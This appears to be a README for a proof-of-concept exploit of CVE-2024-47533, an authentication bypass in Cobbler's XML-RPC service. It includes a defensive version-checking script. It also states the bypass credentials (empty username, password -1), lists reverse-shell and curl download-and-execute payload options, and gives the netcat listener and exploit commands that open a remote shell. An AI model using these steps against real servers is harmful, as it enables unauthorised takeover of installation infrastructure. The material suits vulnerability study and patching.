CVE-2024-47533 - Cobbler XMLRPC Authentication Bypass RCE Exploit POC
CVE-2024-47533 is a critical authentication bypass vulnerability in Cobbler (versions 3.0.0 to before 3.2.3 and 3.3.7) allowing unauthenticated remote code execution via the XMLRPC interface.
Critical Remote Code Execution via Authentication Bypass in Cobbler
PoC implementation by @dollarboysushil
Overview
Cobbler, a Linux installation server that enables rapid setup of network installation environments, has an authentication vulnerability in versions 3.0.0 up to (but not including) 3.2.3 and 3.3.7. The function utils.get_shared_secret() always returns -1, allowing anyone to connect to the Cobbler XML-RPC interface with an empty username ("") and the password -1. This lets an attacker with network access gain full control of the Cobbler server. The vulnerability is fixed in versions 3.2.3 and 3.3.7.
Technical Breakdown
The vulnerability is caused by improper handling of the shared secret in the utils.get_shared_secret() function, which always returns -1, effectively bypassing authentication. This lets any network user connect to Cobbler's XMLRPC interface with empty credentials and execute arbitrary commands.
Vulnerable Endpoint
http://<target>:25151/ (Cobbler's XMLRPC API endpoint)
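As an added defensive check (not part of the PoC repository), the following script classifies a Cobbler version string against the affected ranges stated above and, optionally, asks a server for its version over XML-RPC. It assumes Cobbler's XML-RPC interface exposes an unauthenticated `extended_version()` call returning a dict with a `version` string; no login is attempted.

```python
"""Checker for the Cobbler version ranges affected by CVE-2024-47533."""
import re
import xmlrpc.client

# Ranges as stated in the advisory: 3.0.0 up to (not including) 3.2.3,
# and the 3.3 branch up to (not including) 3.3.7.
FIXED_3_2 = (3, 2, 3)
FIXED_3_3 = (3, 3, 7)


def parse_version(text: str) -> tuple:
    """Turn '3.3.6', '3.2' or '3.3.6-1' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable_version(text: str) -> bool:
    """True if the version falls inside an affected range, False if it carries the fix."""
    v = parse_version(text)
    if v < (3, 0, 0):
        return False            # 2.x is outside the affected range
    if v < FIXED_3_2:
        return True             # 3.0.0 .. 3.2.2
    if (3, 3, 0) <= v < FIXED_3_3:
        return True             # 3.3.0 .. 3.3.6
    return False                # 3.2.3, 3.3.7 and later


def check_server(url: str) -> dict:
    """Query a Cobbler XML-RPC endpoint (e.g. http://host:25151/) for its version.

    Assumption: extended_version() is callable without a token and returns a
    dict containing a 'version' string. Only this read-only call is made.
    """
    proxy = xmlrpc.client.ServerProxy(url)
    info = proxy.extended_version()
    ver = str(info["version"])
    return {"url": url, "version": ver, "vulnerable": is_vulnerable_version(ver)}


if __name__ == "__main__":
    import sys
    print(check_server(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:25151/"))
```

A result of `vulnerable: True` means the host should be upgraded to 3.2.3 / 3.3.7 or later and port 25151 restricted to trusted networks in the meantime.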
Example Payloads
The exploit script supports various reverse shell payloads including:
- Bash reverse shell
- Netcat shells (nc, nc2)
- Python reverse shell
- Curl download & execute
Proof-of-Concept (PoC) Demonstration
Preparing the Listener
Start a Netcat listener on your machine:
nc -lvnp 4444
Launching the Exploit
Run the exploit script CVE-2024-47533-dbs.py:
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
Successful Remote Shell Access
Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.